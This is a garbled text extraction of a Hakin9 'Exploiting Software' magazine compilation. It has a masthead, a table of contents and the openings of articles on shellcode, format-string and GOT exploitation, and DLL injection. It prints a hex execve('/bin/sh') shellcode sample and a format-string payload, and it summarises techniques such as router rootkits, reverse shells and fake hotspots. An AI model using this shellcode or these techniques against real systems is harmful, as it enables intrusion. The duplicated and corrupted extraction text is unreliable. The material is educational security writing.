Вы находитесь на странице: 1из 46

44

4 4 Editor in Chief: Grzegorz Tabaka grzegorz.tabaka@hakin9.org team Managing Editor: Natalia Boniewicz
Editor in Chief: Grzegorz Tabaka grzegorz.tabaka@hakin9.org team Managing Editor: Natalia Boniewicz
Editor in Chief: Grzegorz Tabaka grzegorz.tabaka@hakin9.org team Managing Editor: Natalia Boniewicz

Editor in Chief: Grzegorz Tabaka

grzegorz.tabaka@hakin9.org

team
team

Managing Editor: Natalia Boniewicz

natalia.boniewicz@hakin9.org

Editorial Advisory Board: Daniel Dieterle, Rebecca Wynn, Michael Munt, Aby Rao

Proofreaders: Daniel Dieterle, Nick Baronian, Jeffrey Smith, Robert Wood, Michael Munt, Elliott Bujan, Bob Folden, Steve Hodge, Jonathan Edwards, Steven Atcheson, Mixchal Jahim

Top Betatesters: Nick Baronian, Rebecca Wynn, Rodrigo Rubira Branco, Chris Brereton, Gerardo Iglesias Galvan, Jeff rey Smith, Robert Wood, Nana Onumah, Rissone Ruggero, Shayne Cardwell, Inaki Rodriguez, Bojan Alikavazovic, Arnoud Tijssen

Special Thanks to the Beta testers and Proofreaders who helped us with this issue. Without their assistance there would not be a Hakin9 Expoiting Software magazine.

Senior Consultant/Publisher: Paweł Marciniak

CEO: Grzegorz Tabaka

grzegorz.tabaka@hakin9.org

Production Director: Andrzej Kuca

andrzej.kuca@hakin9.org

DTP: Ireneusz Pogroszewski Art Director: Ireneusz Pogroszewski

ireneusz.pogroszewski@hakin9.org

Publisher: Software Press Sp. z o.o. SK 02-682 Warszawa, ul. Bokserska 1 Phone: 1 917 338 3631

www.hakin9.org/en

Whilst every effort has been made to ensure the high quality of the magazine, the editors make no warranty, express or implied, concerning the results of content usage. All trade marks presented in the magazine were used only for informative purposes.

All rights to trade marks presented in the magazine are reserved by the companies which own them.

To create graphs and diagrams we used by

which own them. To create graphs and diagrams we used by program Mathematical formulas created by

program

own them. To create graphs and diagrams we used by program Mathematical formulas created by Design
own them. To create graphs and diagrams we used by program Mathematical formulas created by Design

Mathematical formulas created by Design Science MathType™

DISCLAIMER!

The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.

misuse of the presented techniques or consequent data loss. Dear Readers, It’s been almost one year

Dear Readers,

It’s been almost one year since the the first issue of Exploiting Software Hakin9 was published. Exploiting Software Bible is the effect of over ten months work and it consists of the best articles of all Exploiting Software Hakin9 issues. It covers a wide range of topics concerning stack overflow, shellcode, stack overflow, reverse engineering, exploiting client software and defense patterns. I would like to express my thanks to all without whose great assistance this issue could not emerge. Special thanks to the authors, editorial advisory board, proof readers, betatesters and graphics. It’s your work and fantastic enthusiasm that made it all possible.

Enjoy the reading, Natalia Boniewicz & Hakin9 Team

work and fantastic enthusiasm that made it all possible. Enjoy the reading, Natalia Boniewicz & Hakin9

01/2012

SHELLCODE

10 Shellcode: From a Simple Bug to OS Control

By Amr Thaber

The secret behind any good exploit is a reliable shellcode. The shellcode is the most important element in your exploit. Generating shellcode with automated tools only helps so much in formulating your exploit. Knowing how to create your own shellcode will help you overcome barriers that lie ahead, and that’s what this article will demonstrate.You will learn how to write a reliable shellcode on the Win32 plaform, how to bypass the obstacles that you will face in writing a win32 shellcode, and how to implement your shellcode into Metasploit.

28 Exploiting Format Strings with Python

By Craig Wright

Format string attacks are not particularly new. Since their widespread public release in 2000, format string vulnerabilities have picked up in intensity as buffer overflows become less common and more widely known. From an unknown start a decade ago, they have become

a common means to exploiting system applications.

These vulnerabilities remain an issue as we still teach

them. It is not uncommon for format string vulnerabilities

to allow the attacker to view all the memory contained

within a process. This is useful as it aids in locating desired variables or instructions within memory. With this knowledge, an attacker can exploit the vulnerability to successfully exploit code and even bypass control such as Address Space Layout Randomization. In this article Craig will discuss crafting attacks using python

in order to attack through DPA (Direct Parameter Access)

such that you can enact a 4-byte overwrite in the DTORS and GOT (Global Access Table) and prepares the reader for a follow-up article on exploiting the GOT and injecting

shell code.

34 DPA Exploitation and GOTs with

Python

By Craig Wright

If we can write into the GOT, we can effectively redirect the execution flow of a program and allowing ourselves to gain a root shell. This article is a follow-up and second part of a look at format strings in the C and

CONTENTS

C++ programming languages; in particular, how these may be abused. The article goes on to discuss crafting

attacks using Python in order to attack through DPA (Direct Parameter Access) such that you can enact a 4- byte overwrite in the DTORS and GOT. This time author endeavoured to make the process of exploiting format string vulnerabilities as simple as possible for the inexperienced exploit developer. A basic knowledge of Python has been assumed as well as an understanding

of the Linux operating system and how to use gdb. This

starts off with detailing the use of Direct Parameter access and how this process works and then describes the Global Offset Tables in detail. You will see that using the exploitation of Direct Parameter Access (DPA) will allow us to write into the address of our choosing.

42 Starting to Write Your Own Linux

Schellcode

By Craig Wright

We have seen more and more people become reliant on tools such as Metasploit in the last decade. This ability to use these tools has empowered many and has created a rise in the number of people who can research software vulnerabilities. It has created more security professionals who cannot only scan a target for vulnerabilities using

a tool such as Nessus, but who can complete tests

involving system exploitations and hence validate the results presented to them by a scanner. But, this ends

when a new application with unexpected calls or controls

is found. What do we do when presented with a special

case? This makes it extremely difficult for signature based systems to stop or detect shellcode created for a specific purpose and hence more likely that the tester will succeed in testing the vulnerability without other controls interfering. If we remain at this level, we will stop the lower level attacker, but fail in stopping more sophisticated attacks. You will learn how to write your own shellcode, how to fix all the nulls and how to validate your shellcode.

48 Beyond Automated Tools and

Frameworks: the shellcode injection process

By Craig Wright

Automated frameworks (including Metasploit) have simplified the testing and exploitation process. This of

frameworks (including Metasploit) have simplified the testing and exploitation process. This of www.hakin9.org/en 5

www.hakin9.org/en

frameworks (including Metasploit) have simplified the testing and exploitation process. This of www.hakin9.org/en 5

5

CONTENTS

course comes with a price. Many penetration testers have become tool jockeys with little understanding of just how software functions. This script kiddie approach to code testing does have its place. It has allowed us to drastically increase the number of people working on testing systems for vulnerabilities and in assessing the risks these pose. At the same time, if these individuals do not progress further, simply relying on the ability to leverage the efforts of others, we will hit bottlenecks in the creation of new tests and processes. This article is going to follow from previous articles as well as going into some of the fundamentals that you will need in order to understand the shellcode creation process, how to use Python as a launch platform for your shellcode and that the various system components are.

54 Understanding conditionals in

shellcode

By Craig Wright

This article is going to follow from previous articles as well as going into some of the fundamentals that you will need in order to understand the shellcode creation process. In this article, we are looking at extending our knowledge of assembly and shellcoding. This is a precursor to the actual injection and hooking process to follow. You will investigate how you can determine code loops, the uses of loops as well as acting as an introduction into how you can reverse engineer assembly or shellcode into a higher level language and even pseudo-code, all of which forms an essential component of creating and executing one’s own exploit successfully. By gaining a deep understanding just how code works and to know where to find the fundamentals shellcode programming language we hope to take the reader from a novice to being able to create and deploy their own shellcode and exploits.

62 Taking control, Functions to DLL

injection

By Craig Wright

DLL injection is one of the most common methods used by malware such as a rootkit to load it into the host’s privileged processes. Once injected, code can be inserted into functions being transmitted between the compromised code and a library function. This step is frequently followed with API hooking where the malicious code is used to vary the library function

calls and returns. This article is part of a monthly series designed to take the reader from a novice to being able

to create and deploy their own shellcode and exploits.

With this knowledge, you will learn just how easy it is for sophisticated attackers to create code that can bypass many security tools. More, armed with this knowledge

you will have the ability to reverse engineer attack code and even malware allowing you to determine what the attacker was intending to launch against your system.

BUFFER OVERFLOW

68 Smashing the Stack

By Marco Balduzzi and Mariano Graziano

For decades hackers have discovered and exploited the

most concealed programming bugs. But how is it possible

to leverage a buffer overflow to compromise software in

modern operating systems? Mariano and Marco will

introduce us to the basic principles of code exploitation.

We will see what happens when a process is executed or

terminated, and how a buffer overflow vulnerability can

be leveraged to execute malicious code.

80 Smashing the Stack 2

By Marco Balduzzi and Mariano Graziano

Modern operating systems come with sophisticated protection mechanisms to prevent one-click exploitations. But, how can attackers bypass such techniques to compromise remote machines all over

the world? And downloading PDF documents is always

a safe practice?Mariano and Marco will describe

the different protection mechanisms that have been introduced in modern operating system to make exploitation more difficult. They will aslo present several popular workarounds used by attacker to bypass such techniques. Finally, they will analyze a real exploit for a Acrobat Reader’s stack-based buffer overflow.

88 Exploit a Software with Buffer

Overflow Vulnerability and Bypassing Aslr Protection

By Ahmed Sherif El-Demrdash

Buffer overflow is an anomaly where a program while

writing data to a buffer overruns the buffer’s boundary and overwrites adjacent memory. This is a special case

of violation of memory safety. It is the most dangerous

vulnerability in the software world because it could allow

violation of memory safety. It is the most dangerous vulnerability in the software world because it

6

violation of memory safety. It is the most dangerous vulnerability in the software world because it

05/2012

for an exploitation for OS which include this vulnerable software. You will learn how to write your own exploitation with python programming language and bypassing ASLR protection and finally, how to run your own shellcode to control Vulnerable OS.

REVERSE

ENGINEERING

98 Reversing EXE with OllyDbg

By Nilesh Kumar

What is reverse engineering (RE)? Normaly, the source code is in human readable form, object files are binary files with human-readable symbols. Executables are pure binaries. When we attempt to revert a binary executable into its object form, it is called disassembly. Converting an object file into source code is called decompilation. The whole process is called reverse engineering. Nilesh illustrates the reverse engineering of a sample executable file, and how to patch it. You will learn how to reverse engineer an exe. The ultimate goal of RE is to bypass the checks to get the things done your way. The process of RE may differ person to person, and program to program.

102 A Quick “Hands On” Introduction to

Packing

By Alain Schneider

On Windows systems, programs are usually available in the PE file format with the EXE extension. Although this file format is quite complex, it is now well documented, so understanding how it is globally supposed to work is pretty easy and you can find a lot of programs designed to open/analyze/modify PE executables. Those which are designed to modify PE files are often called packers. In this article we will learn how to write one of them.

110 Hacking Applets: A Reverse

Engineering Approach

By Nilesh Kumar and Ronnie Johndas

Ronnie and Nilesh will discuss a technique that can be used to modify the applet’s Java byte code without having to recompile the applet. They will show the process of reverse engineering of an applet which does not have any kind of code obfuscation, string encryption and other code protection techniques employed. You will

CONTENTS

learn how to patch byte code and perform other kinds of manipulation in the Java class files of the applet. We will also see how to get a signed applet to run in a standalone manner.

EXPLOITING CLIENT SOFTWARE

116 Hijacking Software Updates with

Evilgrade

By Mourad Ben Lokhua

Almost every modern application comes with a simple, built-in update mechanism. Usually it is sensible for users to accept updates that improve the security and operation of the program. Mourad shows how to attack usersvia update systems. He also claims that software developers do not spend much time or effort on updates and secure delivery mechanisms, that’s why standard processes for updating applications make many users vulnerable.

122 Direct Object Reference or, How a

Toddler Can Hack Your Web Application

By Nick Nikiforakis

There is no point in denying that everyday software is steadily moving from desktop applications to Web applications. When you can check your mail, play games, create documents and file your tax report without ever leaving your browser, then you are indeed a citizen of the Web. In this era, many miscreants have changed their game. It’s easier for them to impersonate you or steal your private data from a vulnerable Web application than to take control of the Extended Instruction Pointer (EIP) register of your CPU. In this article we will investigate one type of Web application vulnerability, namely Direct Object Reference. A Direct Object Reference occurs when an identifier, used in the internal implementation of a Web application, is exposed to users. When this is done insecurely, it can lead to a lot of trouble…

128 How to Recover Passwords from a

Memory Dump

By Daniel Dieterle

Malware analysis is an amazing field. To be able to grab a memory dump from a live machine and then have the capabilities to pull useful information from it just amazes the

from a live machine and then have the capabilities to pull useful information from it just

www.hakin9.org/en

from a live machine and then have the capabilities to pull useful information from it just

7

CONTENTS

author. Can we find pertinent system settings, and even pull information from them? Were you ever curious about what could be done with a memory dump of an active computer? This article is a short demonstration on how to acquire a memory dump from a running system, and then how to use tools to not only recover the system password hashes from the memory dump, but also how to decode them.

134 Creating a Fake Wi-Fi Hotspot to

Capture Connected Users Information

By Roberto Saia

We can use a standard laptop to create a fake open wireless access point that allows us to capture a large amount of information about connected users; in certain environments, such as airports or meeting areas, this kind of operation can represent an enormous security threat but, on the other hand, the same approach is a powerful way to check the wireless activity in certain areas where the security is very important. An attacker can use his properly configured laptop in a large number of public places, even in an airplane, simulating the Wi- Fi gateway used by airline and capturing personal data of connected passengers. With a little effort, anyone can create a fake Wi-Fi Hotspot and use it to gather precious information about connected users, information such as usernames, passwords, messages and so on. You see how an attacker can deceive a large number of users, and consequently capture information that enables him to commit criminal acts such as identity theft.

142 Deceiving Defenses with Nmap

Camouflaged Scanning

By Roberto Saia

Nmap (contraction of ‘Network Mapper’) is an open- source software designed to rapidly scan both single hosts and large networks. To perform its functionalities Nmap uses particular IP packets (raw-packets) in order to probe what hosts are active on the target network:

about these hosts, it is able to discover the running services (type and version), the operating system in use (type and version); it is also able to obtain more advanced information, such as, for example, the type of firewall used on the target network. You will learn how to deceive an IDS/IPS system through a particular feature offered by Nmap software, a simple option able to trick the rules generally used in this kind of systems to detect

any suspect activity inside a medium/large network; the used software is the most famous network scanner in the world and the knowledge of its potentiality is a good way to improve our security policies.

150 Overriding Function Calls in Linux

By Umair Manzoor

Function hooking and overriding plays a vital role in penetration test of thick client application. In this article we will discuss how shared libraries in Linux environment can be overridden with out recompiling the code. By overriding the function calls we can sniff the communication protocol, modify the communication parameters and fuzz the communication protocol.

156 Cracking Java Applications with AOP

exploits (part 1)

By Daniel Drozdzewski

Aspect Oriented Programming is a paradigm that aims to modularise software further by the separation of crosscutting concerns. Daniel will show us the basics of AOP and a simple, yet powerful idea behind the exploit.

160 Cracking Java Applications with AOP

Exploits (part 2)

By Daniel Drozdzewski

AOP has been used in the domain of Software Security before. Its use was mainly for validation, auditing and authorization purposes, which in turn improve software security as a whole. Those crosscutting concerns are being woven into the existing software after the fully functional code has been delivered. Making the process two staged, allows separating the responsibilities.In the second part of the series, Daniel will present the reader with a bit more advanced use of AOP, which will allow us to reverse engineer obfuscated Java applications. On top of that he will show a trick of password post selection, which we use to find parts of the code crucial to password processing, which in turn will allow us to switch the whole password verification off.

166 Cisco IOS Rootkits and Malware: A

practical guide

By Jason Nehrboss

Propagating the worm code into a new router can either be quite easy, difficult, or impossible. There are many

Propagating the worm code into a new router can either be quite easy, difficult, or impossible.

8

Propagating the worm code into a new router can either be quite easy, difficult, or impossible.

05/2012

variations of supported IOS code and hardware platforms. The author discusses the use of and demonstrates an IOS Embedded Event Manager rootkit and worm. When

a router is infected it can be leveraged into a powerful

malware platform. Capabilities demonstrated are network packet captures, reverse shell connections, a spam module, and a mini malware httpd server leveraged with

ip address hijacking. In this article you will learn how to

exploit critical network devices, network traffic traversing these devices and act as a launch point for further attacks into a network You will also learn about a self replicating

IOS worm with stealth features and self defense mechanisms, all with platform independent code.

DEFENSE

180 Easy Network Security Monitoring

with Security Onion

By Daniel Dieterle

Hackers and the malware that they create are getting much better at evading anti-virus programs and firewalls.

So how do you detect or even defend against these advanced threats? Intrusion Detection Systems monitor and analyze your network traffic for malicious threats. The problem is that they can be very difficult to configure and time consuming to install. Some take hours, days or even weeks to setup properly. The Security Onion IDS and Network Security Monitoring system changes all of that. Do you have 10 minutes? That is about how long

it takes to setup and configure Security Onion – a Linux

Security Distribution based on the Ubuntu (Xubuntu 10.04 actually) operating system.

186 Inspecting Https Traffic on Gateways

By Kishin Fatnani

In the past, security devices inspecting application content for attack patterns, misuse or malware, had been

blind to encrypted traffic and because of this, encrypted protocols such as Hypertext Transfer Protocol Secure (HTTPS) have been a safe method used by attackers to bypass security inspection. Though reverse proxies and Web Server modules have been there for long, they only inspect incoming traffic e.g. connections made to protected web servers in the organization. Inspecting outgoing traffic or traffic of connections made by users

to outside world servers not protected by the device, had

been on the wish lists. These days, devices come with the

CONTENTS

capability to inspect Secure Sockets Layer (SSL) based outgoing traffic, however there are some concerns by enabling such kind of inspection. In this article we cover some basics of SSL, the challenges in inspecting SSL traffic, and also see how Check Point’s HTTPS Inspection feature is able to inspect HTTPS traffic at the gateway.

After reading this article you will know the pros and cons

of enabling SSL inspection on a gateway.

192 Detecting Ipv6 Rogue Router

Incidents Using Bro NSM

By Matti Mantere

Internet Protocol version 6 (IPv6) has been a long time coming. As the protocol is making its entrance several security risks of varying criticality are known to exist. However, the amount of skilled personnel needed to assure the security of IPv6 network deployment as well as awareness of the said risks remains woefully low. As IPv6 migration slowly gains momentum, situations where administrators responsible for deployment of network equipment have very poor knowledge and non- existent operational experience of the new protocol are unavoidable. Matti depicts one method for detecting them using open source Bro NSM. Bro Network Security Monitor (Bro NSM) is a flexible open source network analysis framework that is freely distributed under BSD license.

196 The Gentoo Hardened Project:

Or How to Minimize Exploits Risks

By Jesus Rivero

Gentoo’s approach to Linux is evidenced in its Phylosophy1, from there it derives the fact that optimization, flexibility and choices are the keystones of the distribution. Gentoo gives users the tools needed for them to shape their Gentoo installation to their liking and all while building and compiling software especially for

their hardware architecture, not relying in pre-built binaries compiled by someone else. That is one of the reasons why you will hear, users and developers, say that Gentoo is

a “meta-distribution” because the distribution provides

exciting tools that allow users, using the same base system, to build highly secure servers, neat desktops, embedded solutions or even a special VDR system. Jesus will show you how to install a Gentoo Hardened system, how to choose the right profile and kernel and what are the major caveats and potential problems.

how to choose the right profile and kernel and what are the major caveats and potential

www.hakin9.org/en

how to choose the right profile and kernel and what are the major caveats and potential

9

SHELLCODE

Shellcode:

From a Simple Bug to OS Control

10

The secret behind any good exploit is a reliable shellcode. The shellcode is the most important element in your exploit. Generating shellcode with automated tools only helps so much in formulating your exploit. Knowing how to create your own shellcode will help you overcome barriers that lie ahead, and that’s what this article will demonstrate.

I n this article I’m going to teach you how to write a reliable shellcode on the Win32 plaform, how to bypass the obstacles that you will face in writing a win32 shellcode, and how to implement your shellcode into Metasploit.

susceptible to the buffer overflow vulnerability. If your shellcode contains a NULL byte, this byte will be interpreted as a string terminator, with the result that the program accepts the shellcode in front of the NULL byte and discards the rest. So you will have to avoid any null- byte inside your shellcode, but you will have the ability to use just one null byte – the last byte.

Alphanumeric Shellcode:

In strings, it’s not common to see strange characters or Latin characters inside. In this case, some IDSs (Intrusion detection systems) detect these strings as malicious especially when they include suspicious sequence of opcodes. These systems could detect the presence of shellcode. Not only that, but also some applications filter the input string and accept only the normal characters and numbers (a-z, A-Z and 0-9). In this case, you need to write your shellcode in characters. You are forced to use only these characters and only accept bytes from 0x30 to 0x39 and from 0x40 to 0x5A and from 0x60 to 0x7A.

Egg-hunting Shellcode In some vulnerabilities, you may have a very small buffer to insert your shellcode. With the off-by-one vulnerability, you are restricted to a specific size and you can’t send a shellcode bigger than that. Alternatively, you could use two buffers to put your shellcode into. One is for your real shellcode and the second is for attacking and searching the first buffer for the eggs.

Part 2: Writing Shellcode

Shellcode Skeleton

Any shellcode consists of four parts: Getting the delta, getting the kernel32 imagebase, getting your APIs and the payload.

Part 1: The Basics

What’s Shellcode?

Shellcode is simply a portable native code. This code has the ability to run at any place in memory, for example, inside an exploit to connect back to the attacker or do what the attacker needs to do.

The Three Types of Shellcode

Shellcode is classified by the limitations of the environment that you are facing while crafting a program to exploit a specific vulnerability.

Null Byte-Free Shellcode In this type of shellcode, you are forced to write a shellcode without any null byte. For example, while exploiting a vulnerability in a string manipulation code inside a function, C functions such as strcpy() or sprintf() work by searching for the null byte in the string (as strings are null terminated) without checking on the maximum accepted length of this string. A successful byte-free shellcode will make this application

������������������

�������������

��������������������������

������������

�������

Figure 1. Shellcode Skeleton

������������ ������� Figure 1. Shellcode Skeleton 01/2012

01/2012

SHELLCODE

Exploiting format Strings with Python

In this article we will look at format strings in the C and C++ programming languages. In particular, how these may be abused.

T he article progresses to discuss crafting attacks using python in order to attack through DPA (Direct Parameter Access) such that you can

enact a 4-byte overwrite in the DTORS and GOT (Global Access Table) and prepares the reader for a follow-up article on exploiting the GOT and injecting shell code. We demonstrate how these simple but still often overlooked and even taught vulnerabilities can be used to read arbitrary locations from memory, write to memory and execute commands and finally to gain a shell.

Introduction

Format string attacks are not particularly new. Since their widespread public release in 2000, format string vulnerabilities have picked up in intensity as buffer overflows become less common and more widely known. From an unknown start a decade ago, they have become a common means to exploiting system applications. These vulnerabilities (We can see from 2010-06-30: KVIrc DCC Directory Traversal and Multiple Format String Vulnerabilities, that format string vulnerabilities have not disappeared and are still a valid topic today.) remain an issue as we still teach them. We will start by explaining what a format string actually is and then why they can be exploited. It is not uncommon for format string vulnerabilities to allow the attacker to view all the memory contained within a process. This is useful as it aids in locating desired variables or instructions within memory. With this knowledge, an attacker can exploit the vulnerability to successfully exploit code and even bypass control such as Address Space Layout Randomization (ASLR). When a parent process starts, the addressing for that process as well as all subsequent child process in

28

that process as well as all subsequent child process in 28 most implementations will remain static

most implementations will remain static throughout the lifetime of the process. Although an attack may crash

a child process, the parent process is often left intact.

Consequently, attacks against child processes that cause a crash of the particular thread or fork may return useful information. This is particular true when multiple format string attacks can be leveraged against child processes that respond themselves without crashing the parent application. Many Linux implementations incorporate a process- limit in order to limit the number of re-spawns and this can help minimize the impact of the attack noted above by enforcing an RLIMIT_NPROC rlimit (resource limit) of a process through the Linux kernel. In this event, where the executable attempts to fork and a greater number of forks would come into existent than are defined by RLIMIT_NPROC processes, the fork fails. The Linux kernel module, rexFBD when installed, detects excessive forking and stops these. The end result is that memory leaks including format string vulnerabilities can act as a means of locating particular libraries and variables within a running process. The location of both stack and heap variables may be determined. From this, the attacker can discover the structures contained within a program.

What is a Format String?

Not all security people are programmers and consequently we need to start by defining what a format string is. Any format string is basically a set of special parameters that define how to display a variable

number of arguments, for instance when sending a string of data to stdout. A format string essentially exists

to define a variable length of arguments.

Format strings are primarily known in the C family of languages but are also used by Perl, PHP, and even

01/2012

SHELLCODE

DPA Exploitation

and GOTs with Python

This article is a follow-up and second part of a look at format strings in the C and C++ programming languages; in particular, how these may be abused. The article goes on to discuss crafting attacks using Python in order to attack through DPA (Direct Parameter Access) such that you can enact a 4-byte overwrite in the DTORS and GOT (Global Access Table).

I t then continues the attack by exploiting the GOT

and injecting shell code. We demonstrate how these

simple but still often overlooked and even generally

accepted vulnerabilities can be used to read arbitrary locations from memory, write to memory, execute commands, and, finally, to gain a shell.

Introduction

In the first part of this article (presented in Hakin9 in Exploiting Software 2/2011), we discussed format string attacks. In this article we are going to extend these, beginning with DPA (Direct Parameter Access) and moving to using the GOT (Global Offset Table) to spawn a root shell. To gain a complete understanding of this process, it is recommended that part one from last month’s issue is read first. In this paper, we have endeavoured to make the process of exploiting format string vulnerabilities as simple as possible for the inexperienced exploit developer. A basic knowledge of Python has been assumed as well as an understanding of the Linux operating system and how to use gdb. This starts off with detailing the use of Direct Parameter access and how this process works and then describes the Global Offset Tables in detail. If we can write into the GOT, we can effectively redirect the execution flow of a program and allowing ourselves to gain a root shell. This process will also help when there is some form of stack protection that stops us from altering the address pointed to through EIP and redirecting it to a shellcode address. In this process, we will inject a reference in place of that which the GOT references for a selected function. Here we want to have a function that can execute system commands as substitutes to overwriting the subsequent instruction with the memory address that

34

the subsequent instruction with the memory address that 34 the shellcode we wish to call. The

the shellcode we wish to call. The modern protections built into nearly all operating systems have started to load the GOT in a read-only memory area. Where this has occurred, the system avoids the exploitation technique discussed in this paper to a large extent. That being said, it is possible to find systems where these protections have been disabled or older unpatched systems where the complete attacks work natively. At worst, even in a read-only system, the GOT can be read.

Direct Parameter Access

DPA allows an attacker to access arguments through the use of a $ qualifier. Just like we had to learn all of that difficult math before we moved into formulaic integrals in high school, last lesson we learned the hard way to call arguments using format strings. DPA makes format string attacks simple. It allows us to directly call the location we wish to exploit instead of having to pad attacks using %x%x%x… Basically, as we can address the argument directly, we do not have to increment the byte count until we find the memory location we wish to exploit. We showed in the last article how the use of the following syntax will allow us to access the 8th argument from the stack (%8\$x%8\$n) using the $ qualifier. Again,

the 8th argument from the stack ( %8\$x%8\$n ) using the $ qualifier. Again, Figure 1.

Figure 1. What Happened To 100?

01/2012

� ��������������� ���� � ��� � ���������� �
� ��������������� ���� � ��� � ���������� �
� ���������������
���������������

SHELLCODE

Starting to

Write Your Own Linux Shellcode

We have seen more and more people become reliant on tools such as Metasploit in the last decade. This ability to use these tools has empowered many and has created a rise in the number of people who can research software vulnerabilities.

I t has created more security professionals who

cannot only scan a target for vulnerabilities using

a tool such as Nessus, but who can complete tests

involving system exploitations and hence validate the results presented to them by a scanner. But, this ends when a new application with unexpected calls or controls is found. What do we do when presented with a special case? Here we have to again return to the old art of crafting shellcode. At some stage, if we are to be more than white hat script kiddies and want to come to actually understand the application, we need to learn how to craft our own custom shellcode. In this article, we start to explain the process used to do this.

Introduction

We have seen more and more people become reliant on tools such as Metasploit in the last decade. There are valid reasons for this. Simplifying the validation process had made it far easier to check and confirm that vulnerabilities discovered using a scanner such as Nessus can actually be exploited by an attacker and are not simply another false positive. It is far too easy to report on vulnerabilities that do not exist and the ability to verify that holes can actually be exploited is an essential aspect of testing a systems security. To understand risk, we need to know the real level of exploitability. Without this, we are simply guessing. The capability to use these tools has empowered many professionals and has created a rise in the number of people who can research software vulnerabilities. It has created more security professionals who cannot only scan a target for vulnerabilities using a tool such as Nessus, but who can complete tests involving system exploitations and hence validate the results presented to them by a scanner. It is in effect a leg-up and a means

42

them by a scanner. It is in effect a leg-up and a means 42 to quickly

to quickly gain a foothold into the world of security. What needs to be remembered in this however is that it is just a foothold. To continue to grow in this industry, you need to continuously improve and learn. The ability to gain access and validate simple exploits is important, but it is only the start. This ends when a new application with unexpected calls or controls is found. What do we do when presented with a special case? Here we have to again return to the old art of crafting shellcode. In this article, we will start to look at how to write effective shellcode. POC (Proof of Concept) situations frequently require one-off solutions. In these cases the tester or researcher really needs to be able to create their own shellcode to meet the demands imposed at the time. Add to this the rapid rate at which shellcode such as that in the Metasploit Project can become obsolete and you start to see the need to create your own custom shellcode. Shellcode you create yourself will not be incorporated into any anti-malware signature databases or IDS (Intrusion detection system. This can incorporate both HIDS (or host based IDS) as well as NIDS (or network based systems)) signature match lists. More importantly, the ability to write your own shellcode allows one to learn the internal functioning of a system and the assembly calls better than any text book could do. At some stage, if we are to be more than white hat script kiddies and want to come to actually understand the application we need to learn how to craft our own custom shellcode. In this article, we start to explain the process used to do this.

Why Create shellcode?

Shellcode can be complex. To effectively write shellcode, you need to understand what the system

01/2012

SHELLCODE

Beyond Automated

Tools and Frameworks: the shellcode injection process

This article is going to follow from previous articles as well as going into some of the fundamentals that you will need in order to understand the shellcode creation process, how to use Python as a launch platform for your shellcode and that the various system components are.

T his is designed as a precursor to the actual

injection process where we will in a later article

next month introduce the actual injection process

and start to move from automatic exploit frameworks (such as Metasploit) into being able to create and execute one’s own exploit successfully. In order to do this, we need to start understanding just how code works and to know where to find the fundamentals of

the Python programming language. This article will start a monthly series designed to take the reader from

a novice to being able to create and deploy their own shellcode and exploits.

Introduction

Automated frameworks (including Metasploit) have simplified the testing and exploitation process. This of course comes with a price. Many penetration testers have become tool jockeys with little understanding of

just how software functions. This script kiddie approach

to code testing does have its place. It has allowed us to

drastically increase the number of people working on testing systems for vulnerabilities and in assessing the risks these pose. At the same time, if these individuals do not progress further, simply relying on the ability to

leverage the efforts of others, we will hit bottlenecks in the creation of new tests and processes. In previous articles, we have covered a number of topics to do with the creation of shellcode. In this one we shall start to introduce the means that will allow the tester to use that code without having to rely on an external framework. Frameworks do allow for the simpler sharing of code, but also limit us at the same time. They lock the tester into selected platforms. More, attacks in the wild have and are moving further away from the automated framework and the tester needs to be able to anticipate and simulate this to remain as effective. In subsequent articles this will be expanded into the creation of standalone exploit kits. In order to do this, we also need to take a step back and explain the system and the tools we will use in more detail. To achieve this, we will start with describing the various components that are used and to providing an introduction to the Python programming language. This will also extend into a simple method to analyse shellcode using GCC such that we can come to understand what the shellcode others have created is designed to do. This is a useful

Listing 1. Shellcode sample (This sample of shellcode has been taken from Zillion (2002). This page goes into detail as to the operation of the shellcode and the reader is encouraged to step through this. The reader will �nd countless many examples online with a simple Google search and many good examples are also included within the Metasploit framework.)

"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"

"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"

"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x41\x41\x41\x41"

"\x42\x42\x42\x42";

48

"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x41\x41\x41\x41" "\x42\x42\x42\x42" ; 48 01/2012

01/2012

SHELLCODE

Taking Control,

Functions to DLL injection

This article is going to follow from previous articles as well as going into some of the fundamentals that you will need in order to understand the code exploitation process. In this article we look at one of the primary infection steps used to compromise a Windows host, DLL injection.

D LL injection is one of the most common methods used by malware such as a rootkit to load it into the host’s privileged processes. Once injected,

code can be inserted into functions being transmitted between the compromised code and a library function. This step is frequently followed with API hooking where the malicious code is used to vary the library function calls and returns. This article is part of a monthly series designed to take the reader from a novice to being able to create and deploy their own shellcode and exploits.

Introduction

In previous articles, we have covered a number of topics to do with the creation of shellcode and assembly language. We continue with an introduction of one of the primary exploitation processes used against a Windows system. In subsequent articles this will be expanded into the creation of standalone exploit kits and in the deployment of a rootkit. In this article we look at one of the primary infection steps used to compromise a Windows host, DLL injection. This process is used by attackers and is also incorporated into automated frameworks (including Metasploit) as a part of the testing and exploitation process. DLL injection is one of the more common methods used by malware such as a rootkit to load it into the host’s privileged processes. Once injected, code can be inserted into functions being transmitted between the compromised code and a library function. This step is frequently followed with API hooking where the malicious code is used to vary the library function calls and returns. In order to do this, we also need to take a step back and explain the system and the tools we will

62

a step back and explain the system and the tools we will 62 use in more

use in more detail. To achieve this, we will start with describing the various components that are used and to providing an introduction to the Python programming language. This will also extend into a simple method to analyse shellcode using GCC such that we can come to understand what the shellcode others have created is designed to do. This is a useful skill when reversing malware as well as a good way to learn from the existing code base and even to leverage some of the various tools that are freely available already.

What is a DLL?

